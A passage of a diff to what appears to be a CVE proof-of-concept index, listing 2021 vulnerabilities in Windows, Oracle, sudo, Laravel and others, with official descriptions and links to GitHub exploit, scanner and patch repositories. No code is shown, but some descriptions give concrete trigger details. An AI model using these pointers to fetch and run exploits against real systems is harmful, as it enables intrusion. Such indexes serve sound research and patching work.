+- [zha0/Microsoft-CVE-2021-1675](https://github.com/zha0/Microsoft-CVE-2021-1675)
+- [Winter3un/CVE-2021-1675](https://github.com/Winter3un/CVE-2021-1675)
+- [hahaleyile/my-CVE-2021-1675](https://github.com/hahaleyile/my-CVE-2021-1675)
+- [mstxq17/CVE-2021-1675_RDL_LPE](https://github.com/mstxq17/CVE-2021-1675_RDL_LPE)
+- [ly4k/PrintNightmare](https://github.com/ly4k/PrintNightmare)
+- [Wra7h/SharpPN](https://github.com/Wra7h/SharpPN)
+- [OppressionBreedsResistance/CVE-2021-1675-PrintNightmare](https://github.com/OppressionBreedsResistance/CVE-2021-1675-PrintNightmare)
+- [5l1v3r1/CVE-2021-1675-Mitigation-For-Systems-That-Need-Spooler](https://github.com/5l1v3r1/CVE-2021-1675-Mitigation-For-Systems-That-Need-Spooler)
+- [eversinc33/NimNightmare](https://github.com/eversinc33/NimNightmare)
+- [AndrewTrube/CVE-2021-1675](https://github.com/AndrewTrube/CVE-2021-1675)
+- [TheJoyOfHacking/cube0x0-CVE-2021-1675](https://github.com/TheJoyOfHacking/cube0x0-CVE-2021-1675)
+- [TheJoyOfHacking/calebstewart-CVE-2021-1675](https://github.com/TheJoyOfHacking/calebstewart-CVE-2021-1675)
+- [jj4152/cve-2021-1675](https://github.com/jj4152/cve-2021-1675)
+- [r1skkam/PrintNightmare](https://github.com/r1skkam/PrintNightmare)
+- [peckre/PNCVE-Win10-20H2-Exploit](https://github.com/peckre/PNCVE-Win10-20H2-Exploit)
+- [whoami-chmod777/CVE-2021-1675-CVE-2021-34527](https://github.com/whoami-chmod777/CVE-2021-1675-CVE-2021-34527)
+- [whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-](https://github.com/whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-)
+- [0xSs0rZ/Windows_Exploit](https://github.com/0xSs0rZ/Windows_Exploit)
+
+### CVE-2021-1678 (2021-01-12)
+
+Windows Print Spooler Spoofing Vulnerability
+
+
+- [alvaciroliveira/RpcAuthnLevelPrivacyEnabled](https://github.com/alvaciroliveira/RpcAuthnLevelPrivacyEnabled)
+
+### CVE-2021-1699 (2021-01-12)
+
+Windows (modem.sys) Information Disclosure Vulnerability
+
+
+- [waleedassar/CVE-2021-1699](https://github.com/waleedassar/CVE-2021-1699)
+
+### CVE-2021-1732 (2021-02-25)
+
+Windows Win32k Elevation of Privilege Vulnerability
+
+
+- [KaLendsi/CVE-2021-1732-Exploit](https://github.com/KaLendsi/CVE-2021-1732-Exploit)
+- [k-k-k-k-k/CVE-2021-1732](https://github.com/k-k-k-k-k/CVE-2021-1732)
+- [oneoy/CVE-2021-1732-Exploit](https://github.com/oneoy/CVE-2021-1732-Exploit)
+- [linuxdy/CVE-2021-1732_exp](https://github.com/linuxdy/CVE-2021-1732_exp)
+- [Pai-Po/CVE-2021-1732](https://github.com/Pai-Po/CVE-2021-1732)
+- [exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732](https://github.com/exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732)
+- [BeneficialCode/CVE-2021-1732](https://github.com/BeneficialCode/CVE-2021-1732)
+- [ExploitCN/CVE-2021-1732-EXP-](https://github.com/ExploitCN/CVE-2021-1732-EXP-)
+- [r1l4-i3pur1l4/CVE-2021-1732](https://github.com/r1l4-i3pur1l4/CVE-2021-1732)
+- [fenalik/CVE-2021-1732](https://github.com/fenalik/CVE-2021-1732)
+- [4dp/CVE-2021-1732](https://github.com/4dp/CVE-2021-1732)
+- [yangshifan-git/CVE-2021-1732](https://github.com/yangshifan-git/CVE-2021-1732)
+- [asepsaepdin/CVE-2021-1732](https://github.com/asepsaepdin/CVE-2021-1732)
+
+### CVE-2021-1748 (2021-04-02)
+
+A validation issue was addressed with improved input sanitization. This issue is fixed in tvOS 14.4, watchOS 7.3, iOS 14.4 and iPadOS 14.4. Processing a maliciously crafted URL may lead to arbitrary javascript code execution.
+
+
+- [Ivanhoe76zzzz/itmsBlock](https://github.com/Ivanhoe76zzzz/itmsBlock)
+- [ChiChou/mistune-patch-backport](https://github.com/ChiChou/mistune-patch-backport)
+
+### CVE-2021-1782 (2021-04-02)
+
+A race condition was addressed with improved locking. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS 7.3, tvOS 14.4, iOS 14.4 and iPadOS 14.4. A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited..
+
+
+- [raymontag/cve-2021-1782](https://github.com/raymontag/cve-2021-1782)
+- [synacktiv/CVE-2021-1782](https://github.com/synacktiv/CVE-2021-1782)
+
+### CVE-2021-1883 (2021-09-08)
+
+This issue was addressed with improved checks. This issue is fixed in Security Update 2021-004 Mojave, iOS 14.5 and iPadOS 14.5, watchOS 7.4, Security Update 2021-003 Catalina, tvOS 14.5, macOS Big Sur 11.3. Processing maliciously crafted server messages may lead to heap corruption.
+
+
+- [gabe-k/CVE-2021-1883](https://github.com/gabe-k/CVE-2021-1883)
+
+### CVE-2021-1905 (2021-05-07)
+
+Possible use after free due to improper handling of memory mapping of multiple processes simultaneously. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
+
+
+- [TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664](https://github.com/TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664)
+
+### CVE-2021-1961 (2021-09-09)
+
+Possible buffer overflow due to lack of offset length check while updating the buffer value in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
+
+
+- [tamirzb/CVE-2021-1961](https://github.com/tamirzb/CVE-2021-1961)
+
+### CVE-2021-1965 (2021-07-13)
+
+Possible buffer overflow due to lack of parameter length check during MBSSID scan IE parse in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking
+
+
+- [parsdefense/CVE-2021-1965](https://github.com/parsdefense/CVE-2021-1965)
+- [foxtrot/CVE-2021-1965](https://github.com/foxtrot/CVE-2021-1965)
+
+### CVE-2021-1994 (2021-01-20)
+
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021)
+
+### CVE-2021-2021 (2021-01-20)
+
+Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
+
+
+- [TheCryingGame/CVE-2021-2021good](https://github.com/TheCryingGame/CVE-2021-2021good)
+
+### CVE-2021-2109 (2021-01-20)
+
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [Al1ex/CVE-2021-2109](https://github.com/Al1ex/CVE-2021-2109)
+- [rabbitsafe/CVE-2021-2109](https://github.com/rabbitsafe/CVE-2021-2109)
+- [yuaneuro/CVE-2021-2109_poc](https://github.com/yuaneuro/CVE-2021-2109_poc)
+- [dinosn/CVE-2021-2109](https://github.com/dinosn/CVE-2021-2109)
+- [coco0x0a/CVE-2021-2109](https://github.com/coco0x0a/CVE-2021-2109)
+- [Vulnmachines/oracle-weblogic-CVE-2021-2109](https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109)
+
+### CVE-2021-2119 (2021-01-20)
+
+Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).
+
+
+- [Sauercloud/RWCTF21-VirtualBox-61-escape](https://github.com/Sauercloud/RWCTF21-VirtualBox-61-escape)
+- [chatbottesisgmailh/Sauercloude](https://github.com/chatbottesisgmailh/Sauercloude)
+- [shi10587s/Sauercloude](https://github.com/shi10587s/Sauercloude)
+
+### CVE-2021-2173 (2021-04-22)
+
+Vulnerability in the Recovery component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having DBA Level Account privilege with network access via Oracle Net to compromise Recovery. While the vulnerability is in Recovery, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Recovery accessible data. CVSS 3.1 Base Score 4.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N).
+
+
+- [emad-almousa/CVE-2021-2173](https://github.com/emad-almousa/CVE-2021-2173)
+
+### CVE-2021-2175 (2021-04-22)
+
+Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).
+
+
+- [emad-almousa/CVE-2021-2175](https://github.com/emad-almousa/CVE-2021-2175)
+
+### CVE-2021-2302 (2021-04-22)
+
+Vulnerability in the Oracle Platform Security for Java product of Oracle Fusion Middleware (component: OPSS). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Platform Security for Java. Successful attacks of this vulnerability can result in takeover of Oracle Platform Security for Java. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [quynhle7821/CVE-2021-2302](https://github.com/quynhle7821/CVE-2021-2302)
+
+### CVE-2021-2394 (2021-07-20)
+
+Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [lz2y/CVE-2021-2394](https://github.com/lz2y/CVE-2021-2394)
+- [freeide/CVE-2021-2394](https://github.com/freeide/CVE-2021-2394)
+- [BabyTeam1024/CVE-2021-2394](https://github.com/BabyTeam1024/CVE-2021-2394)
+- [fasanhlieu/CVE-2021-2394](https://github.com/fasanhlieu/CVE-2021-2394)
+
+### CVE-2021-2456 (2021-07-20)
+
+Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+- [peterjson31337/CVE-2021-2456](https://github.com/peterjson31337/CVE-2021-2456)
+
+### CVE-2021-2471 (2021-10-20)
+
+Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H).
+
+
+- [SecCoder-Security-Lab/jdbc-sqlxml-xxe](https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe)
+- [cckuailong/CVE-2021-2471](https://github.com/cckuailong/CVE-2021-2471)
+- [DrunkenShells/CVE-2021-2471](https://github.com/DrunkenShells/CVE-2021-2471)
+
+### CVE-2021-3007 (2021-01-04)
+
+Laminas Project laminas-http before 2.14.2, and Zend Framework 3.0.0, has a deserialization vulnerability that can lead to remote code execution if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php. NOTE: Zend Framework is no longer supported by the maintainer. NOTE: the laminas-http vendor considers this a "vulnerability in the PHP language itself" but has added certain type checking as a way to prevent exploitation in (unrecommended) use cases where attacker-supplied data can be deserialized
+
+
+- [Vulnmachines/ZF3_CVE-2021-3007](https://github.com/Vulnmachines/ZF3_CVE-2021-3007)
+
+### CVE-2021-3019 (2021-01-05)
+
+ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.
+
+
+- [B1anda0/CVE-2021-3019](https://github.com/B1anda0/CVE-2021-3019)
+- [0xf4n9x/CVE-2021-3019](https://github.com/0xf4n9x/CVE-2021-3019)
+- [Maksim-venus/CVE-2021-3019](https://github.com/Maksim-venus/CVE-2021-3019)
+- [murataydemir/CVE-2021-3019](https://github.com/murataydemir/CVE-2021-3019)
+- [Aoyuh/cve-2021-3019](https://github.com/Aoyuh/cve-2021-3019)
+- [givemefivw/CVE-2021-3019](https://github.com/givemefivw/CVE-2021-3019)
+- [qiezi-maozi/CVE-2021-3019-Lanproxy](https://github.com/qiezi-maozi/CVE-2021-3019-Lanproxy)
+- [a1665454764/CVE-2021-3019](https://github.com/a1665454764/CVE-2021-3019)
+
+### CVE-2021-3060 (2021-11-10)
+
+An OS command injection vulnerability in the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS software allows an unauthenticated network-based attacker with specific knowledge of the firewall configuration to execute arbitrary code with root user privileges. The attacker must have network access to the GlobalProtect interfaces to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers with Prisma Access 2.1 Preferred and Prisma Access 2.1 Innovation firewalls are impacted by this issue.
+
+
+- [timb-machine-mirrors/rqu1-cve-2021-3060.py](https://github.com/timb-machine-mirrors/rqu1-cve-2021-3060.py)
+- [anmolksachan/CVE-2021-3060](https://github.com/anmolksachan/CVE-2021-3060)
+
+### CVE-2021-3064 (2021-11-10)
+
+A memory corruption vulnerability exists in Palo Alto Networks GlobalProtect portal and gateway interfaces that enables an unauthenticated network-based attacker to disrupt system processes and potentially execute arbitrary code with root privileges. The attacker must have network access to the GlobalProtect interface to exploit this issue. This issue impacts PAN-OS 8.1 versions earlier than PAN-OS 8.1.17. Prisma Access customers are not impacted by this issue.
+
+
+- [0xhaggis/CVE-2021-3064](https://github.com/0xhaggis/CVE-2021-3064)
+
+### CVE-2021-3122 (2021-02-07)
+
+CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration."
+
+
+- [acquiredsecurity/CVE-2021-3122-Details](https://github.com/acquiredsecurity/CVE-2021-3122-Details)
+
+### CVE-2021-3129 (2021-01-12)
+
+Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
+
+
+- [ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
+- [SNCKER/CVE-2021-3129](https://github.com/SNCKER/CVE-2021-3129)
+- [SecPros-Team/laravel-CVE-2021-3129-EXP](https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP)
+- [crisprss/Laravel_CVE-2021-3129_EXP](https://github.com/crisprss/Laravel_CVE-2021-3129_EXP)
+- [nth347/CVE-2021-3129_exploit](https://github.com/nth347/CVE-2021-3129_exploit)
+- [FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129](https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129)
+- [zhzyker/CVE-2021-3129](https://github.com/zhzyker/CVE-2021-3129)
+- [simonlee-hello/CVE-2021-3129](https://github.com/simonlee-hello/CVE-2021-3129)
+- [idea-oss/laravel-CVE-2021-3129-EXP](https://github.com/idea-oss/laravel-CVE-2021-3129-EXP)
+- [knqyf263/CVE-2021-3129](https://github.com/knqyf263/CVE-2021-3129)
+- [cuongtop4598/CVE-2021-3129-Script](https://github.com/cuongtop4598/CVE-2021-3129-Script)
+- [joshuavanderpoll/CVE-2021-3129](https://github.com/joshuavanderpoll/CVE-2021-3129)
+- [shadowabi/Laravel-CVE-2021-3129](https://github.com/shadowabi/Laravel-CVE-2021-3129)
+- [JacobEbben/CVE-2021-3129](https://github.com/JacobEbben/CVE-2021-3129)
+- [hupe1980/CVE-2021-3129](https://github.com/hupe1980/CVE-2021-3129)
+- [0nion1/CVE-2021-3129](https://github.com/0nion1/CVE-2021-3129)
+- [MadExploits/Laravel-debug-Checker](https://github.com/MadExploits/Laravel-debug-Checker)
+- [ajisai-babu/CVE-2021-3129-exp](https://github.com/ajisai-babu/CVE-2021-3129-exp)
+- [keyuan15/CVE-2021-3129](https://github.com/keyuan15/CVE-2021-3129)
+- [qaisarafridi/cve-2021-3129](https://github.com/qaisarafridi/cve-2021-3129)
+- [Zoo1sondv/CVE-2021-3129](https://github.com/Zoo1sondv/CVE-2021-3129)
+- [miko550/CVE-2021-3129](https://github.com/miko550/CVE-2021-3129)
+- [wmasday/CVE-2021-3129](https://github.com/wmasday/CVE-2021-3129)
+- [banyaksepuh/Mass-CVE-2021-3129-Scanner](https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner)
+- [Axianke/CVE-2021-3129](https://github.com/Axianke/CVE-2021-3129)
+- [cc3305/CVE-2021-3129](https://github.com/cc3305/CVE-2021-3129)
+
+### CVE-2021-3130 (2021-01-20)
+
+Within the Open-AudIT up to version 3.5.3 application, the web interface hides SSH secrets, Windows passwords, and SNMP strings from users using HTML 'password field' obfuscation. By using Developer tools or similar, it is possible to change the obfuscation so that the credentials are visible.
+
+
+- [jet-pentest/CVE-2021-3130](https://github.com/jet-pentest/CVE-2021-3130)
+
+### CVE-2021-3131 (2021-01-13)
+
+The Web server in 1C:Enterprise 8 before 8.3.17.1851 sends base64 encoded credentials in the creds URL parameter.
+
+
+- [jet-pentest/CVE-2021-3131](https://github.com/jet-pentest/CVE-2021-3131)
+
+### CVE-2021-3138 (2021-01-14)
+
+In Discourse 2.7.0 through beta1, a rate-limit bypass leads to a bypass of the 2FA requirement for certain forms.
+
+
+- [Mesh3l911/CVE-2021-3138](https://github.com/Mesh3l911/CVE-2021-3138)
+
+### CVE-2021-3156 (2021-01-26)
+
+Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.
+
+
+- [mr-r3b00t/CVE-2021-3156](https://github.com/mr-r3b00t/CVE-2021-3156)
+- [nexcess/sudo_cve-2021-3156](https://github.com/nexcess/sudo_cve-2021-3156)
+- [reverse-ex/CVE-2021-3156](https://github.com/reverse-ex/CVE-2021-3156)
+- [unauth401/CVE-2021-3156](https://github.com/unauth401/CVE-2021-3156)
+- [ymrsmns/CVE-2021-3156](https://github.com/ymrsmns/CVE-2021-3156)
+- [elbee-cyber/CVE-2021-3156-PATCHER](https://github.com/elbee-cyber/CVE-2021-3156-PATCHER)
+- [kernelzeroday/CVE-2021-3156-Baron-Samedit](https://github.com/kernelzeroday/CVE-2021-3156-Baron-Samedit)
+- [yaunsky/cve-2021-3156](https://github.com/yaunsky/cve-2021-3156)
+- [baka9moe/CVE-2021-3156-Exp](https://github.com/baka9moe/CVE-2021-3156-Exp)
+- [ph4ntonn/CVE-2021-3156](https://github.com/ph4ntonn/CVE-2021-3156)
+- [binw2018/CVE-2021-3156-SCRIPT](https://github.com/binw2018/CVE-2021-3156-SCRIPT)
+- [freeFV/CVE-2021-3156](https://github.com/freeFV/CVE-2021-3156)
+- [mbcrump/CVE-2021-3156](https://github.com/mbcrump/CVE-2021-3156)
+- [stong/CVE-2021-3156](https://github.com/stong/CVE-2021-3156)
+- [nobodyatall648/CVE-2021-3156](https://github.com/nobodyatall648/CVE-2021-3156)
+- [blasty/CVE-2021-3156](https://github.com/blasty/CVE-2021-3156)
+- [teamtopkarl/CVE-2021-3156](https://github.com/teamtopkarl/CVE-2021-3156)
+- [Q4n/CVE-2021-3156](https://github.com/Q4n/CVE-2021-3156)
+- [kal1gh0st/CVE-2021-3156](https://github.com/kal1gh0st/CVE-2021-3156)
+- [apogiatzis/docker-CVE-2021-3156](https://github.com/apogiatzis/docker-CVE-2021-3156)
+- [voidlsd/CVE-2021-3156](https://github.com/voidlsd/CVE-2021-3156)
+- [Ashish-dawani/CVE-2021-3156-Patch](https://github.com/Ashish-dawani/CVE-2021-3156-Patch)
+- [SantiagoSerrao/ScannerCVE-2021-3156](https://github.com/SantiagoSerrao/ScannerCVE-2021-3156)
+- [DanielAzulayy/CTF-2021](https://github.com/DanielAzulayy/CTF-2021)
+- [cdeletre/Serpentiel-CVE-2021-3156](https://github.com/cdeletre/Serpentiel-CVE-2021-3156)
+- [dinhbaouit/CVE-2021-3156](https://github.com/dinhbaouit/CVE-2021-3156)
+- [CptGibbon/CVE-2021-3156](https://github.com/CptGibbon/CVE-2021-3156)
+- [perlun/sudo-1.8.3p1-patched](https://github.com/perlun/sudo-1.8.3p1-patched)
+- [1N53C/CVE-2021-3156-PoC](https://github.com/1N53C/CVE-2021-3156-PoC)
+- [0xdevil/CVE-2021-3156](https://github.com/0xdevil/CVE-2021-3156)
+- [gmldbd94/cve-2021-3156](https://github.com/gmldbd94/cve-2021-3156)
+- [jm33-m0/CVE-2021-3156](https://github.com/jm33-m0/CVE-2021-3156)
+- [Rvn0xsy/CVE-2021-3156-plus](https://github.com/Rvn0xsy/CVE-2021-3156-plus)
+- [r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability](https://github.com/r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability)
+- [oneoy/CVE-2021-3156](https://github.com/oneoy/CVE-2021-3156)
+- [worawit/CVE-2021-3156](https://github.com/worawit/CVE-2021-3156)
+- [lmol/CVE-2021-3156](https://github.com/lmol/CVE-2021-3156)
+- [BearCat4/CVE-2021-3156](https://github.com/BearCat4/CVE-2021-3156)
+- [ZTK-009/CVE-2021-3156](https://github.com/ZTK-009/CVE-2021-3156)
+- [capturingcats/CVE-2021-3156](https://github.com/capturingcats/CVE-2021-3156)
+- [LiveOverflow/pwnedit](https://github.com/LiveOverflow/pwnedit)
+- [ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build](https://github.com/ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build)
+- [donghyunlee00/CVE-2021-3156](https://github.com/donghyunlee00/CVE-2021-3156)
+- [TheFlash2k/CVE-2021-3156](https://github.com/TheFlash2k/CVE-2021-3156)
+- [Exodusro/CVE-2021-3156](https://github.com/Exodusro/CVE-2021-3156)
+- [CyberCommands/CVE-2021-3156](https://github.com/CyberCommands/CVE-2021-3156)
+- [0x7183/CVE-2021-3156](https://github.com/0x7183/CVE-2021-3156)
+- [redhawkeye/sudo-exploit](https://github.com/redhawkeye/sudo-exploit)
+- [d3c3ptic0n/CVE-2021-3156](https://github.com/d3c3ptic0n/CVE-2021-3156)
+- [musergi/CVE-2021-3156](https://github.com/musergi/CVE-2021-3156)
+- [halissha/CVE-2021-3156](https://github.com/halissha/CVE-2021-3156)
+- [sharkmoos/Baron-Samedit](https://github.com/sharkmoos/Baron-Samedit)
+- [chenaotian/CVE-2021-3156](https://github.com/chenaotian/CVE-2021-3156)
+- [ret2basic/SudoScience](https://github.com/ret2basic/SudoScience)
+- [puckiestyle/CVE-2021-3156](https://github.com/puckiestyle/CVE-2021-3156)
+- [barebackbandit/CVE-2021-3156](https://github.com/barebackbandit/CVE-2021-3156)
+- [RodricBr/CVE-2021-3156](https://github.com/RodricBr/CVE-2021-3156)
+- [ypl6/heaplens](https://github.com/ypl6/heaplens)
+- [q77190858/CVE-2021-3156](https://github.com/q77190858/CVE-2021-3156)
+- [arvindshima/CVE-2021-3156](https://github.com/arvindshima/CVE-2021-3156)
+- [Mhackiori/CVE-2021-3156](https://github.com/Mhackiori/CVE-2021-3156)
+- [PhuketIsland/CVE-2021-3156-centos7](https://github.com/PhuketIsland/CVE-2021-3156-centos7)
+- [0x4ndy/clif](https://github.com/0x4ndy/clif)
+- [meowhua15/CVE-2021-3156](https://github.com/meowhua15/CVE-2021-3156)
+- [mutur4/CVE-2021-3156](https://github.com/mutur4/CVE-2021-3156)
+- [PurpleOzone/PE_CVE-CVE-2021-3156](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156)
+- [asepsaepdin/CVE-2021-3156](https://github.com/asepsaepdin/CVE-2021-3156)
+- [EthicalSecurity-Agency/Y3A-CVE-2021-3156](https://github.com/EthicalSecurity-Agency/Y3A-CVE-2021-3156)
+- [DDayLuong/CVE-2021-3156](https://github.com/DDayLuong/CVE-2021-3156)
+- [wurwur/CVE-2021-3156](https://github.com/wurwur/CVE-2021-3156)
+- [SamTruss/LMU-CVE-2021-3156](https://github.com/SamTruss/LMU-CVE-2021-3156)
+- [lypd0/CVE-2021-3156-checker](https://github.com/lypd0/CVE-2021-3156-checker)
+
+### CVE-2021-3157
+- [CrackerCat/cve-2021-3157](https://github.com/CrackerCat/cve-2021-3157)
+
+### CVE-2021-3164 (2021-01-21)
+
+ChurchRota 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file via a POST request to resources.php.
+
+
+- [rmccarth/cve-2021-3164](https://github.com/rmccarth/cve-2021-3164)
+
+### CVE-2021-3166 (2021-01-18)
+
+An issue was discovered on ASUS DSL-N14U-B1 1.1.2.3_805 devices. An attacker can upload arbitrary file content as a firmware update when the filename Settings_DSL-N14U-B1.trx is used. Once this file is loaded, shutdown measures on a wide range of services are triggered as if it were a real update, resulting in a persistent outage of those services.
+
+
+- [kaisersource/CVE-2021-3166](https://github.com/kaisersource/CVE-2021-3166)
+
+### CVE-2021-3229 (2021-02-05)
+
+Denial of service in ASUSWRT ASUS RT-AX3000 firmware versions 3.0.0.4.384_10177 and earlier versions allows an attacker to disrupt the use of device setup services via continuous login error.
+
+
+- [fullbbadda1208/CVE-2021-3229](https://github.com/fullbbadda1208/CVE-2021-3229)
+
+### CVE-2021-3279 (2021-07-19)
+
+sz.chat version 4 allows injection of web scripts and HTML in the message box.
+
+
+- [rafaelchriss/CVE-2021-3279](https://github.com/rafaelchriss/CVE-2021-3279)
+
+### CVE-2021-3281 (2021-02-02)
+
+In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by "startapp --template" and "startproject --template") allows directory traversal via an archive with absolute paths or relative paths with dot segments.
+
+
+- [lwzSoviet/CVE-2021-3281](https://github.com/lwzSoviet/CVE-2021-3281)
+
+### CVE-2021-3291 (2021-01-26)
+
+Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.
+
+
+- [ImHades101/CVE-2021-3291](https://github.com/ImHades101/CVE-2021-3291)
+
+### CVE-2021-3310 (2021-03-10)
+
